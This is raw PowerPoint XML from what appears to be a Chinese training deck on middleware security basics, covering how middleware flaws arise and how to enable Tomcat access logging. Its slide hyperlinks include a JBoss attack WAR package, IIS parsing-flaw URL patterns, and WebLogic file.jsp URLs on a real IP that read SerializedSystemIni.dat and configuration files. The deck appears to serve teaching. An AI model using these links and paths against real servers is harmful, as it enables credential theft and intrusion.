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47" r:id="rId6"/>
    <p:sldId id="348" r:id="rId7"/>
    <p:sldId id="349" r:id="rId8"/>
    <p:sldId id="350" r:id="rId9"/>
    <p:sldId id="351" r:id="rId10"/>
    <p:sldId id="352" r:id="rId11"/>
    <p:sldId id="346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43" r:id="rId37"/>
    <p:sldId id="353" r:id="rId38"/>
    <p:sldId id="344" r:id="rId39"/>
    <p:sldId id="345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55" r:id="rId58"/>
    <p:sldId id="356" r:id="rId59"/>
    <p:sldId id="357" r:id="rId60"/>
    <p:sldId id="358" r:id="rId61"/>
    <p:sldId id="302" r:id="rId62"/>
    <p:sldId id="354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61" r:id="rId76"/>
    <p:sldId id="366" r:id="rId77"/>
    <p:sldId id="367" r:id="rId78"/>
    <p:sldId id="360" r:id="rId79"/>
    <p:sldId id="369" r:id="rId80"/>
    <p:sldId id="365" r:id="rId81"/>
    <p:sldId id="370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59" r:id="rId104"/>
    <p:sldId id="337" r:id="rId105"/>
    <p:sldId id="338" r:id="rId106"/>
    <p:sldId id="339" r:id="rId107"/>
    <p:sldId id="340" r:id="rId108"/>
    <p:sldId id="341" r:id="rId109"/>
    <p:sldId id="362" r:id="rId110"/>
    <p:sldId id="363" r:id="rId111"/>
    <p:sldId id="364" r:id="rId112"/>
    <p:sldId id="342" r:id="rId113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64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8191"/>
            <a:ext cx="12192000" cy="4086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594103"/>
            <a:ext cx="4194048" cy="250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731264"/>
            <a:ext cx="2365248" cy="1414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6028" y="3502152"/>
            <a:ext cx="996696" cy="595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06028" y="1004316"/>
            <a:ext cx="2825496" cy="1687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96428" y="10667"/>
            <a:ext cx="1606296" cy="960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507386" y="799668"/>
            <a:ext cx="3267710" cy="682625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3267709" h="682625">
                <a:moveTo>
                  <a:pt x="34467" y="682523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="647877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446671" y="582002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1025194" y="486676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1535353" y="392976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954733" y="308749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2273236" y="239483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594876" y="165138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2916542" y="85153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3236302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3242119" y="51794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3246295" y="87187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3249417" y="111950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3254445" y="149630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3257526" y="174089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3261702" y="209482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267519" y="261277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561063" y="373289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321661" y="544985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659732" y="625261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338821" y="658927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186465" y="672445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89748" y="679458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34467" y="68252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59511" y="1120495"/>
            <a:ext cx="11277600" cy="2702560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2702026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995362" y="74739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2132012" y="141909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597275" y="200571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4648200" y="227063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5546725" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5778500" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="238417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6013450" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7219950" y="226110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8215312" y="199631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8974137" y="167462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9740900" y="124879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10510837" y="69062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2384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8889"/>
            <a:ext cx="12192000" cy="280670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="280670">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="280669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="280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289559"/>
            <a:ext cx="476884" cy="3521710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="476884" h="3521710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="476377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476377" y="3521710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35217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33690" y="459473"/>
            <a:ext cx="690435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2DED1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04040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2DED1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8191"/>
            <a:ext cx="12192000" cy="4086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594103"/>
            <a:ext cx="4194048" cy="250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731264"/>
            <a:ext cx="2365248" cy="1414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6028" y="3502152"/>
            <a:ext cx="996696" cy="595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06028" y="1004316"/>
            <a:ext cx="2825496" cy="1687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96428" y="10667"/>
            <a:ext cx="1606296" cy="960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507386" y="799668"/>
            <a:ext cx="3267710" cy="682625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3267709" h="682625">
                <a:moveTo>
                  <a:pt x="34467" y="682523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="647877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446671" y="582002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1025194" y="486676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1535353" y="392976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954733" y="308749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2273236" y="239483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594876" y="165138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2916542" y="85153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3236302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3242119" y="51794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3246295" y="87187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3249417" y="111950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3254445" y="149630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3257526" y="174089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3261702" y="209482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267519" y="261277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561063" y="373289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321661" y="544985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659732" y="625261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338821" y="658927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186465" y="672445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89748" y="679458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34467" y="68252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59511" y="1120495"/>
            <a:ext cx="11277600" cy="2702560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2702026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995362" y="74739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2132012" y="141909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597275" y="200571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4648200" y="227063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5546725" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5778500" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="238417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6013450" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7219950" y="226110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8215312" y="199631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8974137" y="167462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9740900" y="124879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10510837" y="69062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2384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8889"/>
            <a:ext cx="12192000" cy="280670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="280670">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="280669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="280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289559"/>
            <a:ext cx="476884" cy="3521710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="476884" h="3521710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="476377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476377" y="3521710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35217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2DED1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8191"/>
            <a:ext cx="12192000" cy="4086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594103"/>
            <a:ext cx="4194048" cy="2503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731264"/>
            <a:ext cx="2365248" cy="1414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06028" y="3502152"/>
            <a:ext cx="996696" cy="595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06028" y="1004316"/>
            <a:ext cx="2825496" cy="1687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96428" y="10667"/>
            <a:ext cx="1606296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507386" y="799668"/>
            <a:ext cx="3267710" cy="682625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3267709" h="682625">
                <a:moveTo>
                  <a:pt x="34467" y="682523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="647877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446671" y="582002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1025194" y="486676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1535353" y="392976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954733" y="308749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2273236" y="239483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594876" y="165138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2916542" y="85153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3236302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3242119" y="51794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3246295" y="87187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3249417" y="111950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3254445" y="149630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3257526" y="174089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3261702" y="209482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267519" y="261277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561063" y="373289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321661" y="544985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659732" y="625261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338821" y="658927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186465" y="672445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89748" y="679458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34467" y="68252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59511" y="1120495"/>
            <a:ext cx="11277600" cy="2702560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2702026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995362" y="74739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2132012" y="141909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597275" y="200571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4648200" y="227063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5546725" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5778500" y="237464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2702026"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11277600" h="2702560">
                <a:moveTo>
                  <a:pt x="11277600" y="238417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6013450" y="238417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7219950" y="226110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8215312" y="199631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8974137" y="167462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9740900" y="124879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10510837" y="69062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277600" y="2384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8889"/>
            <a:ext cx="12192000" cy="280670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="280670">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="280669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="280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289559"/>
            <a:ext cx="476884" cy="3521710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="476884" h="3521710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="476377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476377" y="3521710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35217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3690" y="459473"/>
            <a:ext cx="561657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9851" y="1458055"/>
            <a:ext cx="10052685" cy="425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04040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aomatosf.com/rnp/jbossass.war" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joaomatosf@gmail.com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jackson.thuraisamy.me/runtime-exec-payload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ttpd.apache.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www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subscription_info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wstats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xx.com/xx.asp;.jpg" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/xx.asp/xx.j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unetix.com/blog/articles/windows-short-8-3-filenames-web-security-proble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hyperlink" Target="http://www.youtube.com/watch?v=XOd90yCXOP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mirrors.hust.edu.cn/apache/tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20-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tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Logging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tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Logg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mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA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202.112.51.134:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://202.112.51.134:7001/hello/file.jsp?path=./config/config.x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paper.seebug.org/312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ttoin.com/98204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270"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="1270">
                <a:moveTo>
                  <a:pt x="0" y="1270"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000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71169"/>
            <a:ext cx="11709400" cy="5910580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11709400" h="5910580">
                <a:moveTo>
                  <a:pt x="0" y="5910580"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11709273" y="5910580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11709273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12192000" cy="469900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="469900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="469899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="469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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="476377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476377" y="5910580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5910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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192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9272" y="471487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5910262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="5910262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482726" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482726" y="5910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16679" y="2969894"/>
            <a:ext cx="358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中间件安全基</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="40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础</a:t>
            </a:r>
            <a:endParaRPr sz="4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41003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/>
              <a:t>中间件的安全问题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6"/>
            <a:ext cx="10236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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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不同的中间件安全问题针对其部署方式、运行方式、文件结构的不同都会产生较为明显的不同。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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某些中间件存在多种部署方式，或者多种与应用软件结合的方式，在使用不同的部署或者结合方式时，可能会造成不同的安全隐患，进而形成漏洞，遭受攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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某些中间件会使用插件，插件所带来的安全问题会直接作用在中间件上。</a:t>
            </a:r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0013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85219" y="3811270"/>
            <a:ext cx="906780" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="906779" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="906779" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906779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05840" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005840" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005840" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100584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开启日志功能的方法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005839" y="2011679"/>
            <a:ext cx="10279380" cy="2801620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10279380" h="2801620">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10279380" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10279380" y="2801112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28011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522" y="2007374"/>
            <a:ext cx="10288270" cy="2810510"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="10282999" y="2810294"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2810294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2810065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2809379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2808325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2807004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10282999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1028776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800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287533" y="2807004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10286860" y="2808325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10285806" y="2809379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10284472" y="2810065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10282999" y="2810294"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="281051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288270" h="2810510">
                <a:moveTo>
                  <a:pt x="1027823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0278237" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10278237" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="10278237" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10278237" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10282999" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10282999" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10278237" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="10287762" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10282999" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10278237" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="9525" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="10278237" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10278237" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10278237" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10288270" h="2810510">
                <a:moveTo>
                  <a:pt x="10287762" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10278237" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10282999" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287762" y="28055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97723"/>
            <a:ext cx="8714105" cy="290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pattern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的详细说明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  <a:spcBef>
                <a:spcPts val="1280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的格式也可以自定义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362075" marR="2414270" indent="-9042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&lt;valve classname="org.apache.catalina.valves.AccessLogValve"  prefix="localhost_access_log." suffix=".log"</a:t>
            </a:r>
